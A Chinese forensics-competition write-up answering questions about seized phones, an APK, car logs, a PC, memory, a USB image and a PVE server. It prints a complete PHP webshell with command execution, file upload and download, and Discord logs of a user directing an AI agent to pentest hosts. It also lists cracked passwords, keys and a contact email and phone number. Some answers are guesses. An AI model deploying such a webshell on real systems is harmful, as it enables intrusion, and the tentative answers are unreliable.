手机部分

1.分析黄志远phone.E01检材,黄志远手机总共安装了多少款短视频应用?[答案格式:1]
4
image.png
image.png
bilbili个人感觉不算,毕竟是以漫番为主业的…

2.分析黄志远phone.E01检材,黄志远手机安装的龙虾应用的包名是什么?[答案格式:com.xxx.ui]
gptos.intelligence.assistant

3.接上题,首次打开应用的时间是?[答案格式:2021-01-11-01:11:44]
image.png
image.png

2026-04-17 11:53:18

4.分析黄志远phone.E01检材,黄志远使用此应用攻击过多少台主机?[答案格式:1]
image.png

内部含有termux,这是一个终端模拟器,可以虚拟出一个linux系统,但是看了看好像没有
image.png

然后又看了一下上面一道题的小龙虾,里面有个虚拟化的目录,也没看到什么有效信息…

看了一下别人的,得出的结论都是0…

5.分析黄志远phone.E01检材,黄志远使用哪款应用控制了其PC的agent工具[答案格式:wechat]

image.png
discord
6.分析黄志远phone.E01检材,黄志远使用这款应用的版本是多少?[答案格式:111.1]


7.分析黄志远phone.E01检材,接上题,登录的用户名是什么?[答案格式:wwww1234]
image.png

1
{"id":"1492457382372970496","channelId":"1492435477582581933","message":{"type":0,"content":"<@1492424602792497163> 你是一个渗透测试工程师,现在使用kali linux进行系统渗透测试工作。现有有ip192.168.1.16,开放了几个端口","mentions":[{"id":"1492424602792497163","username":"bot1492424602792497163","avatar":null,"discriminator":"4882","public_flags":0,"flags":0,"bot":true,"banner":null,"accent_color":null,"global_name":null,"avatar_decoration_data":null,"collectibles":null,"display_name_styles":null,"banner_color":null,"clan":null,"primary_guild":null}],"mention_roles":[],"attachments":[],"embeds":[],"timestamp":"2026-04-11T09:32:48.475000+00:00","edited_timestamp":null,"flags":32,"components":[],"id":"1492457382372970496","channel_id":"1492435477582581933","author":{"id":"1457974771206852664","username":"test901234.","avatar":null,"discriminator":"0","public_flags":0,"flags":0,"banner":null,"accent_color":null,"global_name":"test901234","avatar_decoration_data":null,"collectibles":null,"display_name_styles":null,"banner_color":null,"clan":null,"primary_guild":null},"pinned":false,"mention_everyone":false,"tts":false,"thread":{"id":"1492457382372970496","type":11,"last_message_id":"1492458684343910451","flags":0,"guild_id":"1492432386686844969","name":"你是一个渗透测试工程师,现在使用kali linux进行系统渗透测试工作。现有有ip192.168.1.16,开放了几个端口","parent_id":"1492435477582581933","rate_limit_per_user":0,"bitrate":64000,"user_limit":0,"rtc_region":null,"owner_id":"1492424602792497163","thread_metadata":{"archived":false,"archive_timestamp":"2026-04-11T09:32:55.118000+00:00","auto_archive_duration":1440,"locked":false,"create_timestamp":"2026-04-11T09:32:55.118000+00:00"},"message_count":4,"member_count":2,"total_message_sent":4,"member_ids_preview":["1457974771206852664","1492424602792497163"]},"reactions":[{"emoji":{"id":null,"name":"✅"},"count":1,"count_details":{"burst":0,"normal":1},"burst_colors":[],"me_burst":false,"burst_me":false,"me":false,"burst_count":0}]},"members":[{"userId":"1457974771206852664","nick":null,"guildId":"1492432386686844969","avatar":null,"avatarDecoration":null,"roles":[],"colorString":null,"colorStrings":null,"premiumSince":null,"isPending":false,"joinedAt":"2026-04-11T07:53:29.052000+00:00","communicationDisabledUntil":null,"flags":0,"collectibles":null,"displayNameStyles":null}],"users":[{"id":"1457974771206852664","username":"test901234.","discriminator":"0","avatar":null,"avatarDecorationData":null,"email":"1051292845@qq.com","verified":true,"bot":false,"system":false,"mfaEnabled":true,"mobile":true,"desktop":false,"premiumType":null,"flags":0,"publicFlags":0,"purchasedFlags":0,"premiumUsageFlags":0,"phone":"+8617799205049","nsfwAllowed":true,"ageVerificationStatus":1,"guildMemberAvatars":{},"hasBouncedEmail":false,"personalConnectionId":null,"globalName":"test901234","banner":null,"primaryGuild":null,"collectibles":null,"displayNameStyles":null,"premiumState":null}],"connectionId":1776434398790}

找到服务器数据库
image.png

1
{"id":"1492431378090819704","name":"test901234的服务器","description":null,"ownerId":"1457974771206852664","icon":null,"splash":null,"banner":null,"homeHeader":null,"preferredLocale":"en-US","features":[],"afkChannelId":null,"afkTimeout":300,"systemChannelId":"1492431378841866334","verificationLevel":0,"joinedAt":"2026-04-11T07:49:28.620Z","defaultMessageNotifications":0,"mfaLevel":0,"application_id":null,"explicitContentFilter":0,"vanityURLCode":null,"premiumTier":0,"premiumSubscriberCount":0,"premiumProgressBarEnabled":false,"systemChannelFlags":0,"rulesChannelId":null,"safetyAlertsChannelId":null,"discoverySplash":null,"publicUpdatesChannelId":null,"maxStageVideoChannelUsers":50,"maxVideoChannelUsers":25,"maxMembers":-1,"nsfwLevel":0,"hubType":null,"latestOnboardingQuestionId":null,"profile":null,"premiumFeatures":null,"moderatorReporting":null,"ownerConfiguredContentLevel":0,"roles":{"1492431378090819704":{"id":"1492431378090819704","name":"@everyone","guildId":"1492431378090819704","permissions":"2248473465835073","mentionable":false,"position":0,"color":0,"colorString":null,"colors":{"tertiary_color":null,"secondary_color":null,"primary_color":0},"colorStrings":{"primaryColor":"#99aab5","secondaryColor":null,"tertiaryColor":null},"hoist":false,"managed":false,"tags":{},"icon":null,"unicodeEmoji":null,"flags":0,"description":null}},"member":{"userId":"1457974771206852664","roles":[]}}

答案:test901234

8.分析黄志远phone.E01检材,该应用与pc端agent的配对码是什么?[答案格式:ABC456]

1
{"id":"1494699070395121686","channelId":"1494699051503976548","message":{"type":0,"content":"Hi~ I don't recognize you yet!\n\nHere's your pairing code: `HNZ6UFW6`\n\nAsk the bot owner to run:\n`hermes pairing approve discord HNZ6UFW6`","mentions":[],"mention_roles":[],"attachments":[],"embeds":[],"timestamp":"2026-04-17T14:00:28.548000+00:00","edited_timestamp":null,"flags":0,"components":[],"id":"1494699070395121686","channel_id":"1494699051503976548","author":{"id":"1492424602792497163","username":"bot1492424602792497163","avatar":null,"discriminator":"4882","flags":0,"bot":true,"banner":null,"accent_color":null,"clan":null,"primary_guild":null,"publicFlags":0,"avatarDecorationData":null,"collectibles":null,"globalName":null,"displayNameStyles":null},"pinned":false,"mention_everyone":false,"tts":false},"members":[],"users":[{"id":"1492424602792497163","username":"bot1492424602792497163","discriminator":"4882","avatar":null,"avatarDecorationData":null,"email":null,"verified":false,"bot":true,"system":false,"mfaEnabled":false,"mobile":false,"desktop":false,"flags":0,"publicFlags":0,"purchasedFlags":0,"premiumUsageFlags":0,"phone":null,"guildMemberAvatars":{},"hasBouncedEmail":false,"personalConnectionId":null,"globalName":null,"banner":null,"primaryGuild":null,"collectibles":null,"displayNameStyles":null,"premiumState":null}],"connectionId":1776434398790}

HNZ6UFW6
9.分析黄志远phone.E01检材,该应用共对几个ip进行扫描?[答案格式:5]
image.png
PixPin_2026-08-11_14-35-27.png
有三个
10.分析黄志远phone.E01检材,该应用总共调用了几个暴力破解工具?[答案格式:1]
image.png
问ai总结的,爆破工具我看应该是gobuster和hydra
答案为2

apk取证

1.分析方俊朗phone.E01检材,筛选优质客户应用将用户查询记录存储在一个加密的本地数据库中。请问该加密数据库的文件名是什么?
chat_history.db
image.png

image.png

2.分析方俊朗phone.E01检材,该应用使用了哪种密钥派生算法来生成数据库加密密钥?请写出完整的算法标识名称。
image.png

image.png

PBKDF2WithHmacSHA256

3.分析方俊朗phone.E01检材,该应用的密钥派生过程中使用了多少次迭代运算?
image.png
image.png
10000次
4.分析方俊朗phone.E01检材,该应用检测动态调试工具时探测了哪个本地端口号?
image.png
27042,frida的默认端口
image.png
5.分析方俊朗phone.E01检材,该应用密钥由多个”盐值片段”拼接后派生而来。请问第一个盐值片段的具体内容是什么?
6.分析方俊朗phone.E01检材,当密钥派生过程出现异常时,应用会使用一个硬编码的备用密钥。请问该备用密钥的完整内容是什么?
f4ll8ack_k3y_2024_pr3d1ct0r

7.分析方俊朗phone.E01检材,分析”优质客户预测”应用,该应用的安全检测模块通过检查一个特定的类名来判断设备是否安装了Hook框架。请问被检测的完整类名是什么?
image.png
对常见的Hook框架进行查找

8.分析方俊朗phone.E01检材,该应用在偏好设置文件中存储了一个密钥校验值。请问存储该校验值的键名(key)是什么?
image.png
在KeyDeriver中查找
9.分析方俊朗phone.E01检材,该应用加密数据库中存储对话记录的数据表名是什么?
image.png

chat_records

10.分析方俊朗phone.E01检材,该应用的密钥生成逻辑,该应用中的第三个盐值片段是通过逐字符拼接生成的。请问该片段拼接后的完整内容是什么?
image.png
X9kZ!qW3

11.分析方俊朗phone.E01检材,该应用使用了载荷在内存中直接加载而不在磁盘落地。若选手希望通过Frida动态拦截明文的DEX字节数组,应该Hook该应用壳的哪个私有方法?
image.png
initDexFromMemory

12.分析方俊朗phone.E01检材,分析应用的壳代码逻辑,其解密密钥由3个字符串片段混淆拼接而成。
image.png
image.png
Sh3ll_L0ad3r_K!4202_y3
13.接上题,当选手尝试使用frida-dexdump等通用脱壳工具动态附加时,应用会立刻闪退。请分析该逻辑,写出该线程触发进程自杀所调用的完整Java系统方法签名。
image.png
在 Java 语言规范中,java.lang 包是唯一一个无需显式使用 import 关键字导入即可直接使用的核心基础包。
Java 编译器在编译任何 .java 文件时,都会默认隐式引入 import java.lang.*;。常见的基础类型和核心工具类均位于此包下,例如:

  • System (java.lang.System)
  • String (java.lang.String)
  • Integer (java.lang.Integer)
  • Thread (java.lang.Thread)
  • Exception (java.lang.Exception)
    14.分析方俊朗phone.E01检材,方俊朗使用其内部通联工具时,共加入过几个群?
    image.png
    2个
    15.分析方俊朗phone.E01检材,方俊朗通过物联网设备漏洞,共获得多少用户信息?
    1
    16.分析周文杰Image.zip检材,周文杰跟其犯罪团伙人员内部通联工具包名是?[答案格式:com.apt.app]
    image.png
    com.socialchat.social_chat_app
    17.分析周文杰Image.zip检材,内部通联app聊天数据库名称是?[答案格式:abc.db]
    18.分析周文杰Image.zip检材,内部通联app聊天数据库密码保存在哪个文件中?[答案格式:Abc.txt]
    19.分析周文杰Image.zip检材,周文杰内部通联app聊天数据库密码是?[答案格式:123-abc]
    20.分析周文杰Image.zip检材,内部通联app聊天数据使用的什么加密算法?[答案格式:ABCDEF]
    21.分析周文杰Image.zip检材,内部通联app用户密码的盐值是?[答案格式:1234abcd]
    22.分析周文杰Image.zip检材,记录周文杰内部通联app登录密码提示的应用包名是?[答案格式:com.temp.app]
    23.分析周文杰Image.zip检材,内部通联app登录密码是?[答案格式:123abc]
    24.分析周文杰Image.zip检材,周文杰在内部通联app中删除了几条聊天记录?[答案格式:123]
    25.分析周文杰Image.zip检材,聊天数据库中,显示聊天数据删除的是哪个字段?[答案格式:ab_cd]
    26.分析林小婉手机检材,发现有个应用隐藏了很多信息,目前已经找到这个应用,它的程序名称是?(请注意,该题的APK检材为:1778310207366_9eee4f1c.apk,该检材已放在工作目录)[答案格式:微信]
    27.分析林小婉手机检材,这个应用有一个安全加密的PIN码,它是多少?[答案格式:12345678]
    28 分析林小婉手机检材,这个应用隐藏的数据中,每个标签数据里,notes字段表示多少?[答案格式:事项]
    29.分析林小婉手机检材,这个应用隐藏的数据中,文件备份服务器的IP地址是多少?[答案格式:192.168.1.1]
    30.分析林小婉手机检材,发现内部通联中财神撤回了一条消息,这个消息的内容是?[答案格式:盘古石杯。]
    31.分析林小婉手机检材,发现了账本,账本打开密码是什么?[答案格式:按实际填写]

    物联网

    image.png
    这个应该是碰撞模块,2025-12-15T23:45:01就是碰撞时间,换算成UTF-8也就是2025-12-16T7:45:01
    data/log下面有大量的日志
    image.png
    通过ai分析可得,canbus应该是负责转弯等的日志记录,dlt是负责系统相关情况的部分
    先查看dlt
    1
    2
    3
    4
    5
    6
    DLT_TIME         APP_ID CTX_ID LVL MSG
    --------------------------------------
    1702654000.123   ADAS   SENS   INFO Start radar initialization
    1702654500.221   ADAS   CTRL   WARN Override Active: LKA requested steer [-45deg]
    1702654800.500   CGW    ROUT   ERR  Invalid CRC on msg 0x0A0
    1702655100.001   SYS    SAFE   FATL COLLISION_DETECTED!!
    注意到0x0的CRC为空
    那么很明显了,黑客应该就是通过注入0x0实现注入

再查看系统日志
image.png

image.png
分析黄志远car.E01检材,事故发生前车辆发生了非驾驶员意图的左转,找出控制车辆异常转向的恶意指令 ID。(答案格式:3B4)
0A0

计算机

计算机第一部分

1.分析刘洋liuyang_pc.E01检材,提取磁盘镜像SHA1值的前6位?[答案格式:字母小写]
5bc418

2.分析刘洋liuyang_pc.E01检材,计算机系统Build版本为?[答案格式:19000]
26100.1742

3.分析刘洋liuyang_pc.E01检材,计算机最后一次正常关机的时间为?UTC +0[答案格式:2025-05-06-09:00:00]
2026-04-21 00:25:35,要减去8h,也就就是2026-04-20 16:25:35

4.分析刘洋liuyang_pc.E01检材,计算机网卡的MAC地址为?[答案格式:00-0B-00-A0-00-00]
00-50-56-30-26-1C
image.png
5.分析刘洋liuyang_pc.E01检材,分析机主是从那里下载的typora?[答案格式:阿里云]
image.png

image.png
image.png
很明显是蓝奏云的
6.分析刘洋liuyang_pc.E01检材,刘洋在2026-04-19 13:46:01(UTC +0)曾访问过百度云盘,请给云盘的打开密码?[答案格式:11aa]
PixPin_2026-08-12_16-20-10.png

image.png

48gy
7.分析刘洋liuyang_pc.E01检材,请给出刘洋管理pve集群所用的端口号?[答案格式:8000]
8006
image.png

8.分析刘洋liuyang_pc.E01检材,请给出刘洋登录理财网站所使用的密码?[答案格式:password]
image.png
9.分析刘洋liuyang_pc.E01检材,请给出理财网站的IP地址?[答案格式:127.0.0.1]
192.168.0.70
image.png

10.分析刘洋liuyang_pc.E01检材,请给出计算机内Bitlocker加密分区恢复密钥的前6位?[答案格式:6位数字]
image.png

560615

11.分析刘洋liuyang_pc.E01检材,找出VC加密容器的密钥文件,给出该密钥文件的绝对路径?[答案格式:D:\ABC\123\测试.txt]
image.png
image.png
感觉宽高有点问题
image.png
image.png
12.接上题,该VC加密容器的密钥文件的图像高度是多少像素?[答案格式:1345]
1080
image.png

13.分析刘洋liuyang_pc.E01检材,请给出团队重要信息加密保存的软件名?[答案格式:abc123]
1Password
image.png
不少位置都能找到这款软件
image.png

直接在开始这里就能直接打开
image.png
版本是7.3的,是老版
14.分析刘洋liuyang_pc.E01检材,该软件的保险库文件名为什么?[答案格式:abc.abc]
image.png
用everything可以找到加密箱liuyang.opvault,爆破文件就是profile.js
image.png

image.png
15.分析刘洋liuyang_pc.E01检材,该软件的保险库文件打开密码是什么?[答案格式:124@password]
没一会就爆出来了,liuyang@6419
image.png
16.分析刘洋liuyang_pc.E01检材,请给出用户刘洋的开机密码?[答案格式:p@ssw0rd123]
电脑密码页出来了
6yang@2o26
image.png

image.png
17.分析刘洋liuyang_pc.E01检材,请给出pve服务器的管理密码?[答案格式:p@ssw0rd123]
image.png
20.分析刘洋liuyang_pc.E01检材,请解密该脚本加密工具加密的文件 database.php.obf,给出该文件内的 数据库密码?[答案格式:p@ssw0rd123]
不需要解密数据库哈,里面直接就有数据库的密码
image.png
21.分析刘洋liuyang_pc.E01检材,找出刘洋计算机内的交易信息.rar,给出该文件的打开密码?[答案格式:p@ssw0rd123]
image.png
pgscup@9541
22.分析刘洋liuyang_pc.E01检材,找出刘洋计算机内刘桂荣的身份证号码?[答案格式:510657199808071131]
image.png
有三个刘桂荣?
image.png
就经验来说,420100200106295186应该更符合答案吧

内存取证

23.分析刘洋ly-memdump.mem镜像,给出用户刘洋的NT哈希值?[答案格式:数字字母组合,字母小写]
image.png
24.分析刘洋ly-memdump.mem镜像,给出1Password密码管理器的数据库文件名?[答案格式:123ABc.abc]
image.png
25.分析刘洋ly-memdump.mem镜像,1Password在VeraCrypt启动后约多少分钟启动?[答案格式:123]
这里,显示是1Password10.sqlite
image.png
image.png
那就是约2min

计算机第二部分

26.分析黄志远PC.E01镜像,黄志远使用的ai agent的名称是什么?[答案格式:www]
一般agent都会在家目录底下生成个配置文件目录,一般都是自己的名称,也就是hermes
image.png
27.分析黄志远PC.E01镜像,黄志远使用的模型api后4位是什么?[答案格式:abcd]
25e1
image.png
image.png
28.请分析黄志远PC.E01镜像中的渗透.rar文件,分析黄志远PC.E01镜像,黄志远总共攻击了多少台主机?[答案格式:123]
image.png
用的自动化工具,能勉强看出来:今晚去杀鬼
解密rar可得:
image.png
29.请分析黄志远PC.E01镜像中的渗透.rar文件,反编译exploit二进制文件发现其调用了setuid()、setgid()和system(“/bin/bash”),该程序的源文件编译前名称是什么?[答案格式:xxx.c]
image.png

用string能直接看到exploit.c
image.png
30.请分析黄志远PC.E01镜像中的渗透.rar文件,Webshell 功能逻辑研判观察 file_shell.php 的源码,若攻击者请求 ?download=/etc/passwd,程序执行的核心函数是什么?[答案格式:func()]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
if(isset($_GET['download'])) {
$file = $_GET['download'];
if(file_exists($file)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
readfile($file);
exit;
}
}

if(isset($_FILES['file'])) {
$target = basename($_FILES['file']['name']);
if(move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
echo "File uploaded: $target<br>";
}
}

if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
<form method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="Upload">
</form>
<form method="get">
<input type="text" name="cmd" placeholder="Command">
<input type="submit" value="Execute">
</form>

readfile
31.请分析黄志远PC.E01镜像中的渗透.rar文件,Nikto扫描结果发现通过发送超长斜杠序列可以探测目录列举漏洞,该漏洞对应的CVE编号是什么?[答案格式:CVE-XXXX-XXXX]
image.png
CVE-2002-1078

32请分析黄志远PC.E01镜像中的渗透.rar文件,SQLite 数据库结构分析在 users 表的定义中,id 字段使用了 AUTOINCREMENT。这意味着什么?[答案格式:SQL_KEYWORD]
没搞懂什么意思,直接看解析:
AUTOINCREMENT
思路:题目要求答案格式是 SQL_KEYWORD,而表定义中对 id 字段体现这一含义的关键词就是 AUTOINCREMENT。

33.请分析黄志远PC.E01镜像中的渗透.rar文件,Webshell 命令执行参数若要利用 file_shell.php 获取当前系统的用户权限,正确的 URL 参数构造是什么?[答案格式:cmd=xxx]
cmd=id

34.请分析黄志远PC.E01镜像中的渗透.rar文件,API 端口风险判定8000端口运行的技术组件是什么?[答案格式:XxxYyy]
image.png
FastAPI
35.请分析黄志远PC.E01镜像中的渗透.rar文件,数据库存储安全性评估users 表的密码存储存在什么安全隐患?[答案格式:CVE-XXXX-XXXX]
image.png

image.png
image.png
36.请分析黄志远PC.E01镜像中的渗透.rar文件,文件上传漏洞利用条件利用 upload.php 上传漏洞后,攻击者利用 Webshell 前最关键的一步是什么?[答案格式:xxx/]
题目表述真奇怪
uploads/
image.png
37.请分析黄志远PC.E01镜像中的渗透.rar文件,根据通讯录管理系统漏洞清单,CVE-2026-0003(无限制文件上传漏洞)的CVSS评分是多少?[答案格式:1.2]
8.8

38.请分析黄志远PC.E01镜像中的渗透.rar文件,根据file_shell.php源码,文件上传功能使用哪个PHP函数将临时文件移动到目标路径?[答案格式:php_func]
move_uploaded_file($_FILES['file']['tmp_name'], $target),很明显就是这个了
image.png
image.png
39.请分析黄志远PC.E01镜像中的渗透.rar文件,Web 目录遍历隐患uploads/ 目录启用目录列表功能通常由哪个组件控制?[答案格式:apache_opt]
Indexes
image.png
image.png
40.请分析黄志远PC.E01镜像中的渗透.rar文件,敏感凭据深度关联在 address_book.db 中,管理员密码 Str0ngP@ssw0rd2026! 是什么角色?[答案格式:SQL_DEFAULT]
image.png
image.png
image.png
43.请分析黄志远PC.E01镜像中的渗透.rar文件,命令行注入漏洞识别验证 tools.php 命令执行漏洞时,哪个命令返回了uid的值?[答案格式:cmd]
image.png
52 .请分析黄志远PC.E01镜像中的渗透.rar文件,本系统使用的后端数据库技术是什么?[ID:1090]
SQLite

53.请分析黄志远PC.E01镜像中的渗透.rar文件,Webshell 目录处理逻辑文件上传功能中,源码将上传后的文件命名为什么?[答案格式:$_xxx]
image.png
$_FILES

54.请分析黄志远PC.E01镜像中的渗透.rar文件,目标系统运行的 Apache 具体版本号是什么?[答案格式:x.x.xx]
image.png
2.4.66
image.png
9.8
56.请分析黄志远PC.E01镜像中的渗透.rar文件,攻击者最终获取了什么角色的权限?[答案格式:xxx-xxx]
www-data

移动介质取证

1.分析方俊朗UDisk.img检材,第一个扇区前3字节的十六进制值是什么?[答案格式:AA-DD-WW]
image.png

EB-3C-90
image.png

2.分析方俊朗UDisk.img检材,每簇占多少个扇区?[答案格式:2]
需要点存储介质的知识来看,0x0D一般是每簇扇区数,也就是08,答案就是8
image.png

3.分析方俊朗UDisk.img检材,FAT12/16兼容字段”根目录项数”是多少?[答案格式:100]
根目录项数在0x11到0x12处,占两个字节,用小端序读,也就是0x200,换算下来就是512
image.png
4.分析方俊朗UDisk.img检材,隐藏扇区数是多少?[答案格式:13]
image.png
这里,隐藏扇数在0x1C到0x1F四个字节,也就是00 00 00 3f,63个隐藏扇区
image.png
5.分析方俊朗UDisk.img检材,BPB中声明的总扇区数是多少?[答案格式:100000]
FAT家族总共有两个字段给总扇区数的,其中0x13是给FAT16的,而0x20是给FAT32的,占4个字节,也就是80 F0 FA 02
image.png

小端序倒过来02 FA F0 80
image.png
所以,BPB 中声明的总扇区数就是 50000000
6.分析方俊朗UDisk.img检材,每张FAT表占多少个扇区?[答案格式:10000]
image.png

每FAT占磁盘数在0x24,32位,也就是00 00 75 30
image.png
30000

7.分析方俊朗UDisk.img检材,真实的根目录起始簇应为多少?[答案格式:3]
PixPin_2026-08-15_21-04-13.png
根目录起始簇在0x2c处,但这里是伪造的,真实的要去备份引导扇区去读
FAT32规定512个字节为一个扇区,一般都是7号扇区为备份扇区(LBA 6),直接去3072(512*6)字节就可以了,然后再加上备份引导扇区号的偏移量0x2c,加起来就是3116
image.png
image.png

8.分析方俊朗UDisk.img检材,FSInfo扇区号是多少?[答案格式:1]
U盘上写的是0x03,也就是LBA 3,但去了LBA 3发现为空,说明是伪造的
image.png

image.png

但实际上LBA 1是默认的FSInfo扇区号,去512看看
image.png
有很明显的FSInfo的标志信息

9.分析方俊朗 UDisk.img 检材,备份扇区实际引导扇区号是?
6,之前分析过了

10.分析方俊朗 UDisk.img 检材,卷序列号的十六进制值是多少?
卷序列号在0x43,还是找LBA 6,公式一样的:0x43+512*6
image.png
小端序,也就是0C 0F 6F 08

15.电话号码最多的后四位
image.png
2133

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import pandas as pd  
import numpy as np

# 读取 CSV 文件的姓名与电话列
df = pd.read_csv("_00W.csv", usecols=[0, 2])

# 1. 将电话列强制转为字符串并提取后四位,写入新列
df['电话后四位'] = df['电话'].astype(str).str[-4:]

# 2. 统计各个后四位出现的次数
last_four_counts = df['电话后四位'].value_counts()

print("--- 数据预览 ---")
print(df.head())

print("\n--- 电话后四位频数统计 ---")
print(last_four_counts)

16.平均资产最高的 BIN 码
image.png

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import pandas as pd

# 1. 读取包含银行卡号和资产的列(请根据实际 CSV 的列索引调整 usecols,假设资产列在第 8 列)
df = pd.read_csv("_00W.csv", usecols=[7, 8])

# 假设列名分别为 '银行卡号' 和 '资产'(如果 CSV 无表头,可用 df.columns 或下标指定)
# 2. 提取银行卡号前 6 位作为 BIN 码
df['BIN'] = df['银行卡号'].astype(str).str[:6]

print(df.head())
# 3. 按 BIN 码分组,计算资产均值,并降序排列
avg_asset_by_bin = df.groupby('BIN')['资产(人民币)'].mean().sort_values(ascending=False)

# 4. 输出平均资产最高的 BIN 码及其数值
print("平均资产最高的 BIN 码及均值:")
print(avg_asset_by_bin.head(1))

17.邮箱字段中不同域名种类数
Uploading file...x5e2g
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import pandas as pd

# 读取邮箱列(索引为 9)
df = pd.read_csv("_00W.csv", usecols=[9])

# 1. 提取 @ 符号后面的域名后缀
df['域名'] = df['邮箱'].astype(str).str.split('@').str[1]

# 2. 统计不同域名的种类数量
domain_count = df['域名'].nunique()

print(f"邮箱字段中不同域名种类数: {domain_count}")

# 可选:列出所有独立域名及各自出现的频次
# print(df['域名'].value_counts())

18.男性比女性多出
image.png
1
2
3
4
5
6
7
8
9
10
11
import pandas as pd  

# 假设性别列在第 1 列(根据实际 CSV 列索引或列名调整)
df = pd.read_csv("_00W.csv", usecols=[1])

# 假设性别字段值为 '男' / '女'
male_count = (df['性别'] == '男').sum()
female_count = (df['性别'] == '女').sum()

diff = male_count - female_count
print(f"男性比女性多出: {diff} 人")

服务器

1.分析pve集群,请给出pve主机版本号?[答案格式:1.2.3]
image.png
9.1.1
2.分析pve集群,请给出pve主机内核版本?
image.png
6.17.2-1-pve
2.分析pve集群,请给出pve集群名
image.png
这里,pgscup2026
4.分析pve集群,请给出加入集群所用指纹的前6位?
image.png
直接看指纹
F7:2C:A0
image.png

接下来配置ceph,这里最好的方法就是把IP直接配个192.168.70.X段的
image.png
起一个临时的ip地址

1
2
3
ip addr add 192.168.170.50/24 dev vmbr0
ip addr add 192.168.170.51/24 dev vmbr0
ip addr add 192.168.170.52/24 dev vmbr0

重启服务
image.png
image.png
Ceph_pgscup_pool
类别:RBD
8.分析pve集群,请给出Ceph集群的ID的前8位??[答案格式:a1b2c3d4]
image.png
3f28d8bb
9.分析pve集群,请给出Ceph存储设置的最小副本数?[答案格式:123]
image.png
10.分析pve集群,请给出pve集群中虚拟机的快照创建时间?[答案格式:2025-01-11-11:01:01]
image.png
image.png
2026-4-16-15:05:19

image.png
把kvm关掉,然后调整好虚拟机,不能让pve的子虚拟机的配置大于主虚拟机,不然会报错,启动
image.png

image.png

image.png
导出虚拟机后用主机接收
image.png
接下来就没PVE什么事情了

11.对集群内的服务器进行分析,提取该服务器使用的Linux内核完整版本号?[答案格式:1.2.3-123abc_123]
3.10.0-957.el7.x86_64
image.png
12.对集群内的服务器进行分析,提取该服务器SSH服务监听的TCP端口号?[答案格式:123]
PixPin_2026-08-16_19-21-44.png
22端口

13.对集群内的服务器进行分析,提取该服务器网卡的IP地址?[答案格式:127.0.0.1]
image.png
192.168.0.70

14.对集群内的服务器进行分析,提取金麟资本理财网站对应的域名?[答案格式:baidu.com]
image.png
jlzb.vip
15.对集群内的服务器进行分析,服务器中有个加密工具,请给出该工具的名字?[答案格式:abc_def.sh]
一般这种都是找家目录
image.png
果然有一个自解压脚本
PixPin_2026-08-16_19-38-01.png
在44行以后就是加密文件,44行以前是文件处理sh

PixPin_2026-08-16_19-38-40.png
写一个解密脚本

1
2
3
4
5
6
import gzip  
with open(r'.\encrypt_tool.py', 'rb') as f:
lines = f.readlines()
data = b''.join(lines[43:])
result = gzip.decompress(data)
print(result.decode('utf-8'))

得到
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
加密工具 - 用于服务器取证
适用于数据库备份

加密层次:
第1层: XOR加密 (密钥: 0x5A, 位置偏移 i%256)
第2层: Base64编码
第3层: 字符替换表 (ABCD...+/ -> ZYXW...+/)
第4层: 十六进制转换

用法:
python encrypt_tool.py --input <文件路径> --output <输出路径>
python encrypt_tool.py <输入路径> <输出路径>
python encrypt_tool.py --db --output <输出路径>
"""

import os
import sys
import base64
import gzip
import subprocess
import argparse

try:
import codecs
def read_file(path):
with codecs.open(path, 'r', encoding='utf-8') as f:
return f.read()
def write_file(path, content):
with codecs.open(path, 'w', encoding='utf-8') as f:
f.write(content)
except ImportError:
# Python 2
def read_file(path):
with open(path, 'rb') as f:
return f.read().decode('utf-8')
def write_file(path, content):
with open(path, 'wb') as f:
f.write(content.encode('utf-8'))

XOR_KEY = 0x5A
BASE64_TABLE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
CUSTOM_TABLE = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/"


def xor_encrypt(data):
"""第1层: XOR加密"""
result = []
for i, c in enumerate(data):
result.append(chr(ord(c) ^ (XOR_KEY + i) % 256))
return ''.join(result)


def char_swap_encode(data):
"""第3层: 字符替换编码"""
trans = str.maketrans(BASE64_TABLE, CUSTOM_TABLE)
return data.translate(trans)


def obfuscate(data):
"""4层混淆加密"""
step1 = xor_encrypt(data)
step2 = base64.b64encode(step1.encode('utf-8')).decode('ascii')
step3 = char_swap_encode(step2)
step4 = step3.encode('utf-8').hex()
return step4


def encrypt_file(input_path, output_path):
"""加密目标文件"""
content = read_file(input_path)
obfuscated = obfuscate(content)
write_file(output_path, obfuscated)
print("[OK] %s -> %s" % (input_path, output_path))


def main():
is_db = '--db' in sys.argv

# 参数位置判断
if len(sys.argv) >= 3 and not sys.argv[1].startswith('-'):
input_path = sys.argv[1]
output_path = sys.argv[2]
else:
parser = argparse.ArgumentParser(description='加密文件加密工具')
parser.add_argument('--input', '-i', help='输入文件路径')
parser.add_argument('--output', '-o', help='输出文件路径')
parser.add_argument('--db', action='store_true', help='数据库备份模式')
args = parser.parse_args()

input_path = args.input if not args.db else None
output_path = args.output
is_db = args.db

print("=" * 60)
print(" 数据库文件加密工具")
print("=" * 60)
print("")

if is_db:
db_user = 'root'
db_pass = 'pgscup@o26'
db_name = 'jinqin'
password = 'JDSJ2026@Backup'

